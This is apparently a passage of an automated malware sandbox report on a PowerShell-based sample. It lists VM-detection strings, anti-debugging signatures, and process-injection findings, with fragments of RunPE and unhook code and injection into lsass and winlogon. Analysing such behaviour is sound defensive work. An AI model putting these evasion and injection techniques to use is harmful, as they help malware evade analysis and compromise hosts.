Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual USB Mouse
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FAC9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: QEMU HARDDISK
Source: Amcache.hve.11.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VBoxMouse.sys
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: Amcache.hve.11.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.49.dr Binary or memory string: VMware Virtual disk 2.0 6000c29c2bea38880a8a16ee9f37bec9PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: Amcache.hve.11.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.11.dr Binary or memory string: \driver\vmci,\driver\pci
Source: cmd.exe, 00000011.00000003.2404007494.00000253FC17D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2414667829.00000253FC177000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2414573614.00000253FC177000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2414801651.00000253FC177000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2404051341.00000253FC178000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2414965006.00000253FC177000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopAbHorsAGfLWFjJNrKHvWocR=e-Expression 'adnRtmnvxKrKceiWEAAFQW=ion '$TIMGz=qVaeeTRxshUrjZxfqxJBFkNYzLaL=lckmblckpblckrAfNoxIvdXhTBbvJNzCkKYxLKaXkycRIThPnjF=kmblck($Vcvep,AGZcOpprjzwDmCNlvINgjjZlHsYSLqNSSCis=lckSblckyblcksAhnCzrQTYKNgoLUmdjzOYMYqKajhkheLybvqwPqKmnHEAeKjNfwbgEgNiWSyiIJQFcHnpDPnTPBLfuQGqZ
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.dr Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: !Hyper-V PowerShell Direct Service
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.dr Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: Amcache.hve.11.dr Binary or memory string: VMware
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.dr Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $p43da5e64-eb7b-4fa8-a45c-cf68357b99d6C:\Program Files (x86)\Joebox\unpack\wmievasions.ps1lp.
Source: dwm.exe, 0000002A.00000000.2781110332.000001D156AA0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000gB
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxservice
Source: svchost.exe, 00000031.00000000.2819741090.0000022E66A43000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@vmci
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmusrvc2
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: VMware SATA CD00
Source: Amcache.hve.11.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: svchost.exe, 0000002F.00000002.3453193611.00000200A2218000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: NECVMWarVMware SATA CD00
Source: svchost.exe, 00000031.00000002.3426686743.0000022E67060000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: D8VMwareVirtual disk6000c29c2bea38880a8a16ee9f37bec9
Source: Amcache.hve.11.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.dr Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.dr Binary or memory string: D8VMwareVirtual disk6000c29c2bea38880a8a16ee9f37bec98
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: LSI_SASVMware Virtual disk 6000c29c2bea38880a8a16ee9f37bec9
Source: svchost.exe, 00000029.00000000.2774511050.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.dr Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FAC9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: qemu-ga
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $Hyper-V Time Synchronization Service
Source: Amcache.hve.11.dr Binary or memory string: VMware20,1
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: Amcache.hve.11.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.11.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: svchost.exe, 00000031.00000000.2821524945.0000022E6747B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmciAP<
Source: svchost.exe, 00000031.00000000.2821695169.0000022E6749C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: dowvmci
Source: Amcache.hve.11.dr Binary or memory string: VMware VMCI Bus Device
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.49.dr Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: nonicVMware Virtual disk 6000c29c2bea38880a8a16ee9f37bec9
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmmouse.sys
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: Amcache.hve.11.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: Amcache.hve.11.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.11.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.11.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.11.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.11.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxmouse.sys
Source: Amcache.hve.11.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: C:\Program Files\VMware
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.49.dr Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>art(
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.49.dr Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Amcache.hve.11.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: lsass.exe, 00000028.00000000.2769194456.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3404687627.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.3394717290.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2774511050.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.3407396288.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.2798624056.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.2802138190.000001A1CA034000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.3395077606.000001A1CA02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.2812656244.00000200A1241000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.3408969107.00000200A1241000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3416713166.0000022E66A43000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
Source: Amcache.hve.11.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000036.00000000.2839389298.00000227D882B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: svchost.exe, 00000031.00000002.3464975209.0000022E67EE7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: s\Gvmci
Source: svchost.exe, 0000002D.00000000.2801923475.000001A1CA000000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: Amcache.hve.11.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: c:\program files\vmware
Source: lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VBoxSF.sys
Source: dwm.exe, 0000002A.00000002.3466156468.000001D156B0A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.49.dr Binary or memory string: VMwareVirtual disk2.06000c29c2bea38880a8a16ee9f37bec9PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC4084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00000253FC4084B0
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC401E3C LoadLibraryA,GetProcAddress,SleepEx, 17_2_00000253FC401E3C
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC40F440 GetProcessHeap, 17_2_00000253FC40F440
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC408814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_00000253FC408814
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC4084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00000253FC4084B0
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC40CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00000253FC40CD80
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC438814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_00000253FC438814
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC4384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00000253FC4384B0
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC43CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00000253FC43CD80
Source: C:\Windows\System32\conhost.exe Code function: 18_2_000002A5AF36CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_000002A5AF36CD80
Source: C:\Windows\System32\conhost.exe Code function: 18_2_000002A5AF368814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_000002A5AF368814
Source: C:\Windows\System32\conhost.exe Code function: 18_2_000002A5AF3684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_000002A5AF3684B0
Source: C:\Windows\System32\conhost.exe Code function: 37_2_000001780DD28814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 37_2_000001780DD28814
Source: C:\Windows\System32\conhost.exe Code function: 37_2_000001780DD2CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_000001780DD2CD80
Source: C:\Windows\System32\conhost.exe Code function: 37_2_000001780DD284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_000001780DD284B0
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EBCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_0000020175EBCD80
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EB84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_0000020175EB84B0
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EB8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 38_2_0000020175EB8814
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_0000020175EECD80
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_0000020175EE84B0
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 38_2_0000020175EE8814
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 39_2_000002D0165E8814
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000002D0165E84B0
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000002D0165ECD80
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D016618814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 39_2_000002D016618814
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0166184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000002D0166184B0
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D01661CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000002D01661CD80

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code contains process injector
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 36.2.powershell.exe.1b4b4d149e8.12.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 36.2.powershell.exe.1b4bd200000.16.raw.unpack, RunPE.cs .Net Code: Run contains injection code
.NET source code references suspicious native API functions
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Contains functionality to inject code into remote processes
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess, 38_2_0000000140002434
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 3000000
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 16582EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: F14E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 41FA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 16582EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: F14E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 41FA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: 5B042EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: F32B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 9FD62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: CA6E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: 5B012EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: F32B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 9FD62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: CA6E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: EDE62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: ED7B2EBC
